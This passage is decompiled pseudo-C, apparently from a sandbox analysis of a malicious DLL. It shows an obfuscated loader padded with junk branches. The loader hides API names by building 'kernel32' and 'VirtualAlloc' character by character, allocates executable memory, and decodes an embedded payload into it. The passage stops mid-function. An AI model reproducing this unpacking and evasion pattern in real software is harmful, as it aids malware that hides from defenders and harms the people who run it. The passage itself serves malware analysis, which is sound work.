                                                                                                                                    								_t509 = M1000A1C4; // 0x7968706f
                                                                                                                                    								_v140 = _t263;
                                                                                                                                    								_t264 =  *0x1000a1c8; // 0x32336574
                                                                                                                                    								_v136 = _t407;
                                                                                                                                    								_v132 = _t509;
                                                                                                                                    								_v128 = _t264;
                                                                                                                                    								_v124 =  *0x1000a1cc & 0x000000ff;
                                                                                                                                    								LookupPrivilegeDisplayNameA( &_v176,  &_v192,  &_v140,  &_v252,  &_v256); // executed
                                                                                                                                    								ReadEventLogW( &_v256, _v252, _v256,  &_v256, _v256,  &_v256,  &_v248);
                                                                                                                                    								SetupComm( &_v256, _v256, _v248);
                                                                                                                                    								WriteFile( &_v248,  &_v248, _v256,  &_v256,  &_v256);
                                                                                                                                    								_t137 =  &_v244;
                                                                                                                                    								 *_t137 = _v244 - 1;
                                                                                                                                    								__eflags =  *_t137;
                                                                                                                                    							} while ( *_t137 != 0);
                                                                                                                                    							_t342 =  *0x1000e03c; // 0x9b
                                                                                                                                    							_t415 = 0xbf;
                                                                                                                                    							_t517 = 0x9d;
                                                                                                                                    							_t275 = 0xa3;
                                                                                                                                    							while(1) {
                                                                                                                                    								__eflags = _t275 - 0xdb;
                                                                                                                                    								if(_t275 >= 0xdb) {
                                                                                                                                    									goto L34;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t517 - _t342;
                                                                                                                                    								if(_t517 != _t342) {
                                                                                                                                    									L35:
                                                                                                                                    									_t416 =  *0x1000e084 & 0x0000ffff;
                                                                                                                                    									_t276 =  *0x1000e148;
                                                                                                                                    									_t519 =  *0x1000e2f4 & 0x0000ffff;
                                                                                                                                    									__eflags = _t416 - _t519;
                                                                                                                                    									_t583 = 0x81;
                                                                                                                                    									if(_t416 != _t519) {
                                                                                                                                    										L40:
                                                                                                                                    										_t277 =  *0x1000df00 & 0x0000ffff;
                                                                                                                                    										__eflags = _t277 - 0x67;
                                                                                                                                    										_t417 =  *0x1000dee0; // 0xe6c
                                                                                                                                    										_t565 =  *0x1000e14e; // 0x27
                                                                                                                                    										_v208 = 0;
                                                                                                                                    										_v213 = 0x41;
                                                                                                                                    										if(_t277 != 0x67) {
                                                                                                                                    											L45:
                                                                                                                                    											_t418 =  *0x1000e0d8; // 0x1ef
                                                                                                                                    											__eflags = _t418 -  *0x1000e040; // 0x16e
                                                                                                                                    											_v218 = 0x72;
                                                                                                                                    											_v212 = 0x6c;
                                                                                                                                    											if(__eflags <= 0) {
                                                                                                                                    												 *0x1000def1 = 0x77;
                                                                                                                                    											}
                                                                                                                                    											_t278 =  *0x1000e114; // 0x99
                                                                                                                                    											__eflags = _t278 - 0x14a;
                                                                                                                                    											if(_t278 > 0x14a) {
                                                                                                                                    												L53:
                                                                                                                                    												_t279 =  *0x1000e30c; // 0x10c
                                                                                                                                    												_t584 =  *0x1000df48; // 0x140
                                                                                                                                    												__eflags = _t279 - _t584;
                                                                                                                                    												_t520 =  *0x1000e054; // 0x1e6
                                                                                                                                    												_t419 =  *0x1000e080;
                                                                                                                                    												if(_t279 > _t584) {
                                                                                                                                    													L58:
                                                                                                                                    													_t280 =  *0x1000de8a;
                                                                                                                                    													__eflags = _t280 - 0x1d1;
                                                                                                                                    													if(_t280 > 0x1d1) {
                                                                                                                                    														L61:
                                                                                                                                    														__eflags =  *0x1000e184;
                                                                                                                                    														_v198 = 0x33;
                                                                                                                                    														_v204 = 0x6b;
                                                                                                                                    														if( *0x1000e184 != 0) {
                                                                                                                                    															__eflags =  *0x1000e130;
                                                                                                                                    															if( *0x1000e130 != 0) {
                                                                                                                                    																 *0x1000e07e = 0xc8;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    														_t521 =  *0x1000e34c; // 0x1bf
                                                                                                                                    														_t522 = _t521 ^  *0x1000e368;
                                                                                                                                    														_v196 = 0;
                                                                                                                                    														__eflags = _t522;
                                                                                                                                    														if(_t522 != 0) {
                                                                                                                                    															L66:
                                                                                                                                    															 *0x1000e134 = 0x8a;
                                                                                                                                    															goto L67;
                                                                                                                                    														} else {
                                                                                                                                    															__eflags =  *0x1000e2d4 - _t522; // 0x8f
                                                                                                                                    															if(__eflags == 0) {
                                                                                                                                    																L67:
                                                                                                                                    																_t281 =  *0x1000dfcc; // 0x29
                                                                                                                                    																_t523 =  *0x1000e270; // 0x170
                                                                                                                                    																__eflags = _t281 - _t523;
                                                                                                                                    																_v220 = 0x56;
                                                                                                                                    																_v217 = 0x74;
                                                                                                                                    																_v211 = 0x6c;
                                                                                                                                    																_v203 = 0x65;
                                                                                                                                    																_t421 =  *0x1000e234 & 0x0000ffff;
                                                                                                                                    																if(_t281 != _t523) {
                                                                                                                                    																	L71:
                                                                                                                                    																	_t423 =  *0x1000e2ca & 0x0000ffff;
                                                                                                                                    																	_t282 = _t565;
                                                                                                                                    																	__eflags = _t282 - _t423;
                                                                                                                                    																	_v236 = 0x1000c000;
                                                                                                                                    																	_v199 = 0x6c;
                                                                                                                                    																	_v201 = 0x6e;
                                                                                                                                    																	_v197 = 0x32;
                                                                                                                                    																	_v210 = 0x6f;
                                                                                                                                    																	_v244 = _t282;
                                                                                                                                    																	_t524 = 0xaa;
                                                                                                                                    																	if(_t282 != _t423) {
                                                                                                                                    																		L78:
                                                                                                                                    																		_t424 =  *0x1000e144; // 0x83
                                                                                                                                    																		__eflags = (_t424 ^ 0x00000043) -  *0x1000dfdc; // 0x115
                                                                                                                                    																		_v216 = 0x75;
                                                                                                                                    																		_v219 = 0x69;
                                                                                                                                    																		if(__eflags >= 0) {
                                                                                                                                    																			 *0x1000e394 = 0x5d;
                                                                                                                                    																		}
                                                                                                                                    																		_t426 =  *0x1000df0c; // 0x63
                                                                                                                                    																		_t283 =  *0x1000e154 & 0x0000ffff;
                                                                                                                                    																		__eflags = _t283 - _t426;
                                                                                                                                    																		if(_t283 < _t426) {
                                                                                                                                    																			L83:
                                                                                                                                    																			_v240 = GetModuleHandleA( &_v204);
                                                                                                                                    																			_t286 =  *0x1000e06e; // 0xbe
                                                                                                                                    																			__eflags = _t286 - 0xda;
                                                                                                                                    																			_v244 = _t286;
                                                                                                                                    																			if(_t286 < 0xda) {
                                                                                                                                    																				L86:
                                                                                                                                    																				_t585 =  *0x1000df0c & 0x0000ffff;
                                                                                                                                    																				_t566 =  *0x1000e3ec; // 0x96
                                                                                                                                    																				_t287 =  *0x1000e210; // 0xc9
                                                                                                                                    																				_t528 = 0x1f2;
                                                                                                                                    																				_t427 = 0x7f;
                                                                                                                                    																				while(1) {
                                                                                                                                    																					__eflags = _t528 - 0xffd2;
                                                                                                                                    																					if(_t528 >= 0xffd2) {
                                                                                                                                    																						goto L90;
                                                                                                                                    																					}
                                                                                                                                    																					__eflags = _t585 -  *0x1000e2ce;
                                                                                                                                    																					if(_t585 >  *0x1000e2ce) {
                                                                                                                                    																						L91:
                                                                                                                                    																						_t288 = GetProcAddress(_v240,  &_v220);
                                                                                                                                    																						_t429 =  *0x1000e399;
                                                                                                                                    																						_t586 =  *0x1000e040 & 0x0000ffff;
                                                                                                                                    																						_t530 =  *0x1000e3c4 & 0x0000ffff;
                                                                                                                                    																						_t289 = 0x116;
                                                                                                                                    																						__eflags = _t429 - 0x116;
                                                                                                                                    																						_v244 = _t288;
                                                                                                                                    																						if(_t429 < 0x116) {
                                                                                                                                    																							L96:
                                                                                                                                    																							_t290 = VirtualAlloc(0, 0x1c, 0x3000, 0x40); // executed
                                                                                                                                    																							 *0x1000f0d0 = _t290;
                                                                                                                                    																							_t291 =  *0x1000e114 & 0x0000ffff;
                                                                                                                                    																							_t430 = _t291;
                                                                                                                                    																							__eflags = _t430 - 0x50;
                                                                                                                                    																							_v240 = _t291;
                                                                                                                                    																							_t531 = 0x166;
                                                                                                                                    																							if(_t430 < 0x50) {
                                                                                                                                    																								L103:
                                                                                                                                    																								_t431 =  *0x1000e350; // 0x13a
                                                                                                                                    																								_t532 =  *0x1000dfb0; // 0x118
                                                                                                                                    																								__eflags = _t431 - _t532;
                                                                                                                                    																								if(_t431 < _t532) {
                                                                                                                                    																									L106:
                                                                                                                                    																									_t432 =  *0x1000e1a0; // 0x11e
                                                                                                                                    																									__eflags = _t432 -  *0x1000e324; // 0x1f2
                                                                                                                                    																									_t533 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    																									if(__eflags >= 0) {
                                                                                                                                    																										 *0x1000e1c0 = 0x8a;
                                                                                                                                    																									}
                                                                                                                                    																									 *((intOrPtr*)(_t533 + 4)) = 0x331;
                                                                                                                                    																									 *((intOrPtr*)(_t533 + 8)) = 0x9e3;
                                                                                                                                    																									_t292 =  *0x1000e264 & 0x0000ffff;
                                                                                                                                    																									__eflags = _t292 - 0x150;
                                                                                                                                    																									_t433 =  *0x1000e1f8; // 0x1d8
                                                                                                                                    																									if(_t292 != 0x150) {
                                                                                                                                    																										L112:
                                                                                                                                    																										 *((intOrPtr*)(_t533 + 0xc)) = 0x9000;
                                                                                                                                    																										_t534 =  *0x1000e134; // 0x8a
                                                                                                                                    																										_t293 = 0x76;
                                                                                                                                    																										__eflags = _t534 - 0x76;
                                                                                                                                    																										_t434 = 0x76;
                                                                                                                                    																										if(_t534 > 0x76) {
                                                                                                                                    																											L118:
                                                                                                                                    																											_t294 =  *0x1000e1ac;
                                                                                                                                    																											__eflags = _t294 - 0x1b;
                                                                                                                                    																											_t435 = 0x65;
                                                                                                                                    																											if(_t294 > 0x1b) {
                                                                                                                                    																												L122:
                                                                                                                                    																												_t535 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    																												 *_t535 = "Erodium"; // executed
                                                                                                                                    																												_v244 = VirtualAlloc(0, 0x1e3c, 0x3000, 0x40);
                                                                                                                                    																												_t296 =  *0x1000e26c; // 0x10e
                                                                                                                                    																												__eflags = _t296 -  *0x1000e144; // 0x83
                                                                                                                                    																												if(__eflags < 0) {
                                                                                                                                    																													_t436 =  *0x1000dfc4; // 0xe27
                                                                                                                                    																												} else {
                                                                                                                                    																													_t436 = 0x8c;
                                                                                                                                    																													 *0x1000dfc4 = 0x8c;
                                                                                                                                    																												}
                                                                                                                                    																												_t297 =  *0x1000e184;
                                                                                                                                    																												__eflags = _t297 - 0xa;
                                                                                                                                    																												if(_t297 != 0xa) {
                                                                                                                                    																													L128:
                                                                                                                                    																													_t298 =  *0x1000e03c;
                                                                                                                                    																													__eflags = _t298 - 0xad;
                                                                                                                                    																													_t587 =  *0x1000e208; // 0x3b
                                                                                                                                    																													_v240 = 0;
                                                                                                                                    																													_t437 = 0x11;
                                                                                                                                    																													_t536 = 0x68;
                                                                                                                                    																													if(_t298 != 0xad) {
                                                                                                                                    																														L133:
                                                                                                                                    																														_t299 =  *0x1000de8c;
                                                                                                                                    																														_t588 =  *0x1000e1a0; // 0x11e
                                                                                                                                    																														 *0x1000f0e0 =  &_v236;
                                                                                                                                    																														_t538 =  *0x1000e078;
                                                                                                                                    																														__eflags = _t299 - _t538;
                                                                                                                                    																														_t438 = 0xc4;
                                                                                                                                    																														if(_t299 > _t538) {
                                                                                                                                    																															L138:
                                                                                                                                    																															_t539 = _v240;
                                                                                                                                    																															do {
                                                                                                                                    																																_t300 =  *0x1000f0e0; // 0x30f8e8
                                                                                                                                    																																_t301 =  *0x1000f0e8; // 0x78f
                                                                                                                                    																																 *0x1000f0e8 = _t301 + 1;
                                                                                                                                    																																_t303 =  *0x1000e26c & 0x0000ffff;
                                                                                                                                    																																_t441 =  *((intOrPtr*)( *_t300 + _t301 * 4)) - 0x45907;
                                                                                                                                    																																__eflags = _t303 - 0xbb;
                                                                                                                                    																																if(_t303 != 0xbb) {
                                                                                                                                    																																	goto L142;
                                                                                                                                    																																}
                                                                                                                                    																																do {
                                                                                                                                    																																	_t303 = _t303 + 1;
                                                                                                                                    																																	__eflags = _t303 - 0xbb;
                                                                                                                                    																																	 *0x1000e388 = 0x42;
                                                                                                                                    																																	 *0x1000e134 = 0xd9;
                                                                                                                                    																																	 *0x1000e106 = 0xda;
                                                                                                                                    																																	 *0x1000e2fc = 0x440;
                                                                                                                                    																																} while (_t303 == 0xbb);
                                                                                                                                    																																L142:
                                                                                                                                    																																 *((char*)(_t539 + _v244)) = _t441;
                                                                                                                                    																																_t539 =  &(_t539->i);
                                                                                                                                    																																__eflags = _t539 - 0x78f;
                                                                                                                                    																															} while (_t539 < 0x78f);
                                                                                                                                    																															_t442 =  *0x1000debc; // 0x1e7
                                                                                                                                    																															__eflags = (_t442 ^ 0x000000c0) -  *0x1000e114; // 0x99
                                                                                                                                    																															if(__eflags <= 0) {
                                                                                                                                    																																 *0x1000ded4 = 0x2c;
                                                                                                                                    																															}
                                                                                                                                    																															_t305 =  *0x1000e188 & 0x0000ffff;
                                                                                                                                    																															__eflags = _t305 - 0x859;
                                                                                                                                    																															if(_t305 != 0x859) {
                                                                                                                                    																																L148:
                                                                                                                                    																																_t306 =  *0x1000e208 & 0x0000ffff;
                                                                                                                                    																																_v244 = _v244 + 0xb2;
                                                                                                                                    																																__eflags = _t306 - 0x1f2;
                                                                                                                                    																																_t444 =  *0x1000e040; // 0x16e
                                                                                                                                    																																_t541 = 9;
                                                                                                                                    																																if(_t306 > 0x1f2) {
                                                                                                                                    																																	L153:
                                                                                                                                    																																	_t307 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    																																	 *((intOrPtr*)(_t307 + 0x14)) = GetProcAddress;
                                                                                                                                    																																	_t308 =  *0x1000df08; // 0x9f
                                                                                                                                    																																	__eflags = _t308 - 0xbb;
                                                                                                                                    																																	if(_t308 > 0xbb) {
                                                                                                                                    																																		L156:
                                                                                                                                    																																		_t309 =  *0x1000e350; // 0x13a
                                                                                                                                    																																		__eflags = _t309 - 0xc6;
                                                                                                                                    																																		_t446 =  *0x1000e100 & 0x0000ffff;
                                                                                                                                    																																		 *0x1000f0dc = _v244;
                                                                                                                                    																																		if(_t309 > 0xc6) {
                                                                                                                                    																																			L160:
                                                                                                                                    																																			_t311 =  *0x1000ded4 & 0x0000ffff;
                                                                                                                                    																																			__eflags = _t311 - 0x136;
                                                                                                                                    																																			if(_t311 < 0x136) {
                                                                                                                                    																																				L163:
                                                                                                                                    																																				_t447 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    																																				_t543 = GetModuleHandleA;
                                                                                                                                    																																				 *(_t447 + 0x18) = GetModuleHandleA;
                                                                                                                                    																																				_t448 =  *0x1000e350; // 0x13a
                                                                                                                                    																																				_t312 = 0xffffffc9;
                                                                                                                                    																																				__eflags =  *0x1000df00 - _t312; // 0x129
                                                                                                                                    																																				if(__eflags != 0) {
                                                                                                                                    																																					L169:
                                                                                                                                    																																					_pop(_t568);
                                                                                                                                    																																					_pop(_t590);
                                                                                                                                    																																					_pop(_t347);
                                                                                                                                    																																					__eflags = _v120 ^ _t605;
                                                                                                                                    																																					return E10002ECD(0xb2, _t347, _v120 ^ _t605, _t543, _t568, _t590);
                                                                                                                                    																																				}
                                                                                                                                    																																				_t591 =  *0x1000dfcc; // 0x29
                                                                                                                                    																																				_t569 =  *0x1000e020; // 0x19c
                                                                                                                                    																																				_t543 =  *0x1000e10f; // -76
                                                                                                                                    																																				while(1) {
                                                                                                                                    																																					__eflags = _t448 -  *0x1000df94; // 0x88
                                                                                                                                    																																					if(__eflags > 0) {
                                                                                                                                    																																						goto L169;
                                                                                                                                    																																					}
                                                                                                                                    																																					 *0x1000df35 = 0xb5;
                                                                                                                                    																																					__eflags = (_t543 ^  *0x1000e22c) - _t591;
                                                                                                                                    																																					 *0x1000ded7 = 0x1b;
                                                                                                                                    																																					 *0x1000e290 = 0xad;
                                                                                                                                    																																					 *0x1000ded6 = 0xd1;
                                                                                                                                    																																					if((_t543 ^  *0x1000e22c) <= _t591) {
                                                                                                                                    																																						 *0x1000e07e = 0xb1;
                                                                                                                                    																																					}
                                                                                                                                    																																					_t312 = _t312 + _t569;
                                                                                                                                    																																					_t448 = _t448 + 0x28;
                                                                                                                                    																																					__eflags = _t312 - 0xffffffc9;
                                                                                                                                    																																					if(_t312 == 0xffffffc9) {
                                                                                                                                    																																						continue;
                                                                                                                                    																																					} else {
                                                                                                                                    																																						goto L169;
                                                                                                                                    																																					}
                                                                                                                                    																																				}
                                                                                                                                    																																				goto L169;
                                                                                                                                    																																			}
                                                                                                                                    																																			_t316 = _t311 + 0xfffffecb & 0x0000ffff;
                                                                                                                                    																																			do {
                                                                                                                                    																																				_t316 = _t316 - 1;
                                                                                                                                    																																				__eflags = _t316;
                                                                                                                                    																																				 *0x1000e210 = 0xa0;
                                                                                                                                    																																				 *0x1000e07d = 0xa8;
                                                                                                                                    																																				 *0x1000e138 = 0xa4;
                                                                                                                                    																																				 *0x1000e12c = 0x837;
                                                                                                                                    																																			} while (_t316 != 0);
                                                                                                                                    																																			goto L163;
                                                                                                                                    																																		}
                                                                                                                                    																																		while(1) {
                                                                                                                                    																																			__eflags = _t446 - 0x67;
                                                                                                                                    																																			if(_t446 != 0x67) {
                                                                                                                                    																																				goto L160;
                                                                                                                                    																																			}
                                                                                                                                    																																			_t309 = _t309 + 1;
                                                                                                                                    																																			__eflags = _t309 - 0xc6;
                                                                                                                                    																																			 *0x1000e1d8 = 0xcc;
                                                                                                                                    																																			 *0x1000e14c = 0xd6b;
                                                                                                                                    																																			 *0x1000e28c = 0x2b4;
                                                                                                                                    																																			 *0x1000dfb4 = 0x98;
                                                                                                                                    																																			_t446 = 0x66;
                                                                                                                                    																																			if(_t309 <= 0xc6) {
                                                                                                                                    																																				continue;
                                                                                                                                    																																			}
                                                                                                                                    																																			goto L160;
                                                                                                                                    																																		}
                                                                                                                                    																																		goto L160;
                                                                                                                                    																																	}
                                                                                                                                    																																	_t550 = (0xb81702e1 * (0x000000bb - _t308 & 0x0000ffff) >> 0x20 >> 7) + 1;
                                                                                                                                    																																	__eflags = _t550;
                                                                                                                                    																																	_t319 = _t550 & 0x0000ffff;
                                                                                                                                    																																	do {
                                                                                                                                    																																		_t319 = _t319 - 1;
                                                                                                                                    																																		__eflags = _t319;
                                                                                                                                    																																		 *0x1000dfb4 = 0x54;
                                                                                                                                    																																		 *0x1000dfc4 = 0xe27;
                                                                                                                                    																																		 *0x1000e07e = 0x82;
                                                                                                                                    																																		 *0x1000df3f = 0x87;
                                                                                                                                    																																	} while (_t319 != 0);
                                                                                                                                    																																	goto L156;
                                                                                                                                    																																}
                                                                                                                                    																																while(1) {
                                                                                                                                    																																	__eflags = _t541 -  *0x1000e108; // 0x51
                                                                                                                                    																																	if(__eflags != 0) {
                                                                                                                                    																																		goto L153;
                                                                                                                                    																																	}
                                                                                                                                    																																	__eflags = _t444 - 0x298;
                                                                                                                                    																																	if(_t444 != 0x298) {
                                                                                                                                    																																		goto L153;
                                                                                                                                    																																	}
                                                                                                                                    																																	_t306 = _t306 + 1;
                                                                                                                                    																																	_t541 = _t541 - 1;
                                                                                                                                    																																	__eflags = _t306 - 0x1f2;
                                                                                                                                    																																	 *0x1000df3c = 0xae;
                                                                                                                                    																																	 *0x1000e14e = 0x6b4;
                                                                                                                                    																																	 *0x1000e07e = 0xd8;
                                                                                                                                    																																	 *0x1000e1e0 = 0x55;
                                                                                                                                    																																	_t444 = 0x299;
                                                                                                                                    																																	if(_t306 <= 0x1f2) {
                                                                                                                                    																																		continue;
                                                                                                                                    																																	}
                                                                                                                                    																																	goto L153;
                                                                                                                                    																																}
                                                                                                                                    																																goto L153;
                                                                                                                                    																															} else {
                                                                                                                                    																																do {
                                                                                                                                    																																	_t305 = _t305 + 1;
                                                                                                                                    																																	__eflags = _t305 - 0x859;
                                                                                                                                    																																	 *0x1000e38c = 0xb2;
                                                                                                                                    																																	 *0x1000e400 = 0xb1;
                                                                                                                                    																																	 *0x1000e138 = 0x826;
                                                                                                                                    																																} while (_t305 == 0x859);
                                                                                                                                    																																goto L148;
                                                                                                                                    																															}
                                                                                                                                    																														}
                                                                                                                                    																														while(1) {
                                                                                                                                    																															__eflags = _t438 - 0xc4;
                                                                                                                                    																															if(_t438 != 0xc4) {
                                                                                                                                    																																goto L138;
                                                                                                                                    																															}
                                                                                                                                    																															__eflags = _t588 -  *0x1000e3c4;
                                                                                                                                    																															if(_t588 <  *0x1000e3c4) {
                                                                                                                                    																																goto L138;
                                                                                                                                    																															}
                                                                                                                                    																															_t299 = _t299 + 1;
                                                                                                                                    																															_t588 = _t588 - 1;
                                                                                                                                    																															__eflags = _t299 - _t538;
                                                                                                                                    																															 *0x1000e0e0 = 0;
                                                                                                                                    																															 *0x1000e1d8 = 0x55;
                                                                                                                                    																															 *0x1000df3f = 0x1d;
                                                                                                                                    																															 *0x1000e14e = 0xd40;
                                                                                                                                    																															_t438 = 0xc5;
                                                                                                                                    																															if(_t299 <= _t538) {
                                                                                                                                    																																continue;
                                                                                                                                    																															}
                                                                                                                                    																															goto L138;
                                                                                                                                    																														}
                                                                                                                                    																														goto L138;
                                                                                                                                    																													}
                                                                                                                                    																													while(1) {
                                                                                                                                    																														__eflags = _t587 - _t437;
                                                                                                                                    																														if(_t587 != _t437) {
                                                                                                                                    																															goto L133;
                                                                                                                                    																														}
                                                                                                                                    																														__eflags = _t536 -  *0x1000e020;
                                                                                                                                    																														if(_t536 <  *0x1000e020) {
                                                                                                                                    																															goto L133;
                                                                                                                                    																														}
                                                                                                                                    																														_t298 = _t298 - 0x62;
                                                                                                                                    																														_t536 = _t536 - 1;
                                                                                                                                    																														_t587 = _t587 + 0x99;
                                                                                                                                    																														__eflags = _t298 - 0xad;
                                                                                                                                    																														_t437 = 0x9b;
                                                                                                                                    																														 *0x1000e300 = 0x389;
                                                                                                                                    																														 *0x1000e208 = 0x2b;
                                                                                                                                    																														if(_t298 == 0xad) {
                                                                                                                                    																															continue;
                                                                                                                                    																														}
                                                                                                                                    																														goto L133;
                                                                                                                                    																													}
                                                                                                                                    																													goto L133;
                                                                                                                                    																												} else {
                                                                                                                                    																													do {
                                                                                                                                    																														_t297 = _t297 - _t436;
                                                                                                                                    																														__eflags = _t297 - 0xa;
                                                                                                                                    																														 *0x1000e28c = 1;
                                                                                                                                    																														 *0x1000e07e = 0x62;
                                                                                                                                    																														 *0x1000e338 = 0x7c;
                                                                                                                                    																													} while (_t297 == 0xa);
                                                                                                                                    																													goto L128;
                                                                                                                                    																												}
                                                                                                                                    																											}
                                                                                                                                    																											while(1) {
                                                                                                                                    																												__eflags = _t435 - 0xffbb;
                                                                                                                                    																												if(_t435 < 0xffbb) {
                                                                                                                                    																													goto L122;
                                                                                                                                    																												}
                                                                                                                                    																												_t294 = _t294 + 0x65;
                                                                                                                                    																												_t435 = _t435 - 1;
                                                                                                                                    																												__eflags = _t294 - 0x1b;
                                                                                                                                    																												 *0x1000ded4 = 0x88;
                                                                                                                                    																												if(_t294 <= 0x1b) {
                                                                                                                                    																													continue;
                                                                                                                                    																												}
                                                                                                                                    																												goto L122;
                                                                                                                                    																											}
                                                                                                                                    																											goto L122;
                                                                                                                                    																										}
                                                                                                                                    																										_t597 =  *0x1000e3c8; // 0x140
                                                                                                                                    																										_t574 =  *0x1000e368; // 0x81
                                                                                                                                    																										while(1) {
                                                                                                                                    																											__eflags = _t434 - 0x76;
                                                                                                                                    																											if(_t434 != 0x76) {
                                                                                                                                    																												goto L118;
                                                                                                                                    																											}
                                                                                                                                    																											__eflags = (_t574 ^ _t597) - _t434;
                                                                                                                                    																											 *0x1000e33c = 0x32;
                                                                                                                                    																											if((_t574 ^ _t597) < _t434) {
                                                                                                                                    																												 *0x1000e1d8 = 0xd7;
                                                                                                                                    																											}
                                                                                                                                    																											_t293 = _t293 - 1;
                                                                                                                                    																											_t434 = _t434 + 1;
                                                                                                                                    																											__eflags = _t293 - _t534;
                                                                                                                                    																											if(_t293 >= _t534) {
                                                                                                                                    																												continue;
                                                                                                                                    																											} else {
                                                                                                                                    																												goto L118;
                                                                                                                                    																											}
                                                                                                                                    																										}
                                                                                                                                    																										goto L118;
                                                                                                                                    																									} else {
                                                                                                                                    																										_t598 =  *0x1000dffc; // 0x139
                                                                                                                                    																										while(1) {
                                                                                                                                    																											__eflags = _t433 - _t598;
                                                                                                                                    																											if(_t433 != _t598) {
                                                                                                                                    																												goto L112;
                                                                                                                                    																											}
                                                                                                                                    																											_t292 = _t292 - 0xe1;
                                                                                                                                    																											_t433 = _t433 + 0xe1;
                                                                                                                                    																											__eflags = _t292 - 0x150;
                                                                                                                                    																											 *0x1000df3f = 0x6a;
                                                                                                                                    																											if(_t292 == 0x150) {
                                                                                                                                    																												continue;
                                                                                                                                    																											}
                                                                                                                                    																											goto L112;
                                                                                                                                    																										}
                                                                                                                                    																										goto L112;
                                                                                                                                    																									}
                                                                                                                                    																								}
                                                                                                                                    																								_t458 = _t431 - _t532 + 1;
                                                                                                                                    																								do {
                                                                                                                                    																									_t458 = _t458 - 1;
                                                                                                                                    																									__eflags = _t458;
                                                                                                                                    																									 *0x1000e14e = 0x27;
                                                                                                                                    																								} while (_t458 != 0);
                                                                                                                                    																								goto L106;
                                                                                                                                    																							}
                                                                                                                                    																							_t575 =  *0x1000de8c; // 0x13d
                                                                                                                                    																							_t599 =  *0x1000e14e; // 0x27
                                                                                                                                    																							while(1) {
                                                                                                                                    																								__eflags = _t531 - 0x166;
                                                                                                                                    																								if(_t531 < 0x166) {
                                                                                                                                    																									goto L103;
                                                                                                                                    																								}
                                                                                                                                    																								__eflags = _t575;
                                                                                                                                    																								 *0x1000e0cc = 0x91;
                                                                                                                                    																								if(_t575 != 0) {
                                                                                                                                    																									__eflags =  *0x1000e020 * 0xd3d;
                                                                                                                                    																									if( *0x1000e020 * 0xd3d != 0) {
                                                                                                                                    																										 *0x1000ded7 = 0xda;
                                                                                                                                    																									}
                                                                                                                                    																								}
                                                                                                                                    																								_t430 = _t430 - _t599;
                                                                                                                                    																								_t531 = _t531 + 0x7d;
                                                                                                                                    																								__eflags = _t430 - 0x50;
                                                                                                                                    																								if(_t430 >= 0x50) {
                                                                                                                                    																									continue;
                                                                                                                                    																								} else {
                                                                                                                                    																									goto L103;
                                                                                                                                    																								}
                                                                                                                                    																							}
                                                                                                                                    																							goto L103;
                                                                                                                                    																						}
                                                                                                                                    																						_t576 =  *0x1000dffc; // 0x139
                                                                                                                                    																						while(1) {
                                                                                                                                    																							__eflags = _t586 - 0x116;
                                                                                                                                    																							if(_t586 < 0x116) {
                                                                                                                                    																								goto L96;
                                                                                                                                    																							}
                                                                                                                                    																							__eflags = _t530 - 0x41;
                                                                                                                                    																							if(_t530 > 0x41) {
                                                                                                                                    																								goto L96;
                                                                                                                                    																							}
                                                                                                                                    																							_t289 = _t289 + 1;
                                                                                                                                    																							_t530 = _t530 + _t576;
                                                                                                                                    																							_t586 = _t586 - 0xa6;
                                                                                                                                    																							__eflags = _t289 - _t429;
                                                                                                                                    																							 *0x1000e2c9 = 0xd8;
                                                                                                                                    																							if(_t289 <= _t429) {
                                                                                                                                    																								continue;
                                                                                                                                    																							}
                                                                                                                                    																							goto L96;
                                                                                                                                    																						}
                                                                                                                                    																						goto L96;
                                                                                                                                    																					}
                                                                                                                                    																					__eflags = _t427 - 0x95;
                                                                                                                                    																					if(_t427 > 0x95) {
                                                                                                                                    																						goto L91;
                                                                                                                                    																					}
                                                                                                                                    																					L90:
                                                                                                                                    																					_t427 = _t427 + _t287;
                                                                                                                                    																					_t528 = _t528 - 1;
                                                                                                                                    																					 *0x1000e049 = 3;
                                                                                                                                    																					_t585 = _t585 + _t566;
                                                                                                                                    																				}
                                                                                                                                    																			}
                                                                                                                                    																			_t459 =  *0x1000ded8;
                                                                                                                                    																			do {
                                                                                                                                    																				_v244 = _v244 - _t459;
                                                                                                                                    																				__eflags = _v244 - 0xda;
                                                                                                                                    																				 *0x1000e07d = 0x41;
                                                                                                                                    																			} while (_v244 >= 0xda);
                                                                                                                                    																			goto L86;
                                                                                                                                    																		} else {
                                                                                                                                    																			do {
                                                                                                                                    																				_t283 = _t283 - 1;
                                                                                                                                    																				__eflags = _t283 - _t426;
                                                                                                                                    																				 *0x1000e401 = 0x4c;
                                                                                                                                    																			} while (_t283 >= _t426);
                                                                                                                                    																			goto L83;
                                                                                                                                    																		}
                                                                                                                                    																	}
                                                                                                                                    																	_t361 =  *0x1000e240; // 0x6a
                                                                                                                                    																	_t577 =  *0x1000e328; // 0x12d
                                                                                                                                    																	_t323 = _t282 - _t565 + 0xce;
                                                                                                                                    																	__eflags = _t323;
                                                                                                                                    																	_t600 = _t323 & 0x0000ffff;
                                                                                                                                    																	while(1) {
                                                                                                                                    																		__eflags = _t600 -  *0x1000e12c; // 0x54
                                                                                                                                    																		if(__eflags != 0) {
                                                                                                                                    																			goto L78;
                                                                                                                                    																		}
                                                                                                                                    																		__eflags = _t524 - 0xaa;
                                                                                                                                    																		if(_t524 > 0xaa) {
                                                                                                                                    																			goto L78;
                                                                                                                                    																		}
                                                                                                                                    																		_t325 = _t361;
                                                                                                                                    																		_t326 = _t325 + _t325 * 2;
                                                                                                                                    																		_t327 = _t325 + _t325 * 2 + _t326;
                                                                                                                                    																		_t328 = _t325 + _t325 * 2 + _t326 + _t327;
                                                                                                                                    																		__eflags = _t577 - _t325 + _t325 * 2 + _t326 + _t327 + _t328;
                                                                                                                                    																		 *0x1000ded4 = 0x64;
                                                                                                                                    																		if(_t577 > _t325 + _t325 * 2 + _t326 + _t327 + _t328) {
                                                                                                                                    																			 *0x1000e188 = 0xb2;
                                                                                                                                    																		}
                                                                                                                                    																		_v244 = _v244 - 1;
                                                                                                                                    																		_t524 = _t524 + 1;
                                                                                                                                    																		_t600 = _t600 - 1;
                                                                                                                                    																		__eflags = _v244 - _t423;
                                                                                                                                    																		if(_v244 == _t423) {
                                                                                                                                    																			continue;
                                                                                                                                    																		} else {
                                                                                                                                    																			goto L78;
